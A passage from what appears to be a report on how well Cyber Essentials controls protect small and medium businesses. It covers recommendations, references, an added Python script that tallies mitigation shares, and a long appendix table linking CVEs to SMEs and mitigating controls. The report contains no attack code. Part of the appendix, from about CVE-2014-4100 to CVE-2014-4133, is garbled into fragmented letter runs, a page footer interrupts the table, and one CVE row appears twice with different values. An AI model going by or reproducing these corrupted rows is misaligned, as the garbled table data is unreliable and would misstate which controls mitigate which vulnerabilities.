The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education & Awareness along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for large organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.
An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (~600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most commonly used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber security.
Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
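The proportions quoted above come from the per-CVE assessment tabulated in the Cyber Controls Applicability appendix, where each row records which SMEs a vulnerability applies to and which controls mitigate it with Cyber Essentials in place. The following added example (not the report's own tooling) parses rows written in that appendix layout and derives the two figures the section relies on: the share of vulnerabilities each control helps mitigate, and the mitigation status per SME. The six sample rows are a constructed subset in the appendix format, so the shares they produce are illustrative and differ from the 200-vulnerability figures in the text; the alias mapping that folds labels such as "Strong Password" into Access Control is an assumption of this example.

```python
from collections import Counter
from typing import Dict, List, NamedTuple

# The five Cyber Essentials controls, as named in the appendix cells.
CONTROLS = ("Patch Management", "Secure Configuration", "Firewall", "Anti-Malware", "Access Control")

# Assumed aliases: labels the appendix uses for the same control.
ALIASES = {
    "Malware Protection": "Anti-Malware",
    "Strong Password": "Access Control",
    "User Access": "Access Control",
    "Access Policy": "Access Control",
    "Boundary Firewall": "Firewall",
}

SME_NAMES = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")

# Constructed sample rows in the appendix layout:
# CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
SAMPLE_ROWS = [
    "CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware",
    "CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management",
    "CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)",
    "CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management",
    "CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall",
    "CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management",
]


class Row(NamedTuple):
    cve: str
    applies: Dict[str, bool]   # which SMEs (and the idealised network) the CVE applies to
    with_ce: str               # "Mitigated", "Partially Mitigated" or "Not Mitigated"
    controls: List[str]        # canonical control names credited in the With CE cell


def parse_row(line: str) -> Row:
    """Split one pipe-separated appendix row into its fields."""
    cells = [c.strip() for c in line.split("|")]
    cve, flags, with_ce = cells[0], cells[1:6], cells[7]
    applies = {name: flag.lower() == "y" for name, flag in zip(SME_NAMES, flags)}
    status, _, control_text = with_ce.partition(" - ")
    lowered = control_text.lower()
    controls = [name for name in CONTROLS if name.lower() in lowered]
    for alias, canonical in ALIASES.items():
        if alias.lower() in lowered and canonical not in controls:
            controls.append(canonical)
    return Row(cve, applies, status.strip(), controls)


def control_share(rows: List[Row]) -> Dict[str, float]:
    """Fraction of CVEs each control helps mitigate (fully or partially).
    Rows left 'Not Mitigated' even with CE do not credit any control."""
    counts: Counter = Counter()
    for row in rows:
        if row.with_ce in ("Mitigated", "Partially Mitigated"):
            counts.update(row.controls)
    return {name: round(counts[name] / len(rows), 3) for name in CONTROLS}


def mitigation_by_sme(rows: List[Row]) -> Dict[str, Counter]:
    """For each SME, count the With-CE outcomes over the CVEs that apply to it."""
    result = {name: Counter() for name in SME_NAMES}
    for row in rows:
        for name, applies in row.applies.items():
            if applies:
                result[name][row.with_ce] += 1
    return result


if __name__ == "__main__":
    rows = [parse_row(line) for line in SAMPLE_ROWS]
    for control, share in control_share(rows).items():
        print(f"{control:<21} {share:.1%}")
    for sme, outcomes in mitigation_by_sme(rows).items():
        print(f"{sme}: {dict(outcomes)}")
```

Running the same functions over the full appendix reproduces the report's method of crediting a control whenever it appears in a row's "With CE" cell; the numbers quoted in this section are what that method yields over all two hundred rows.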
Recommendations
To further improve cyber security across the UK, we recommend that:
1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.
2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.
3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.
References
[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.
[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.
[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list, March 2015.
[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.
[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.
[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.
[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.
[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.
[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.
[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.
[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.
[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.
[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.
[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.
[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Websi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
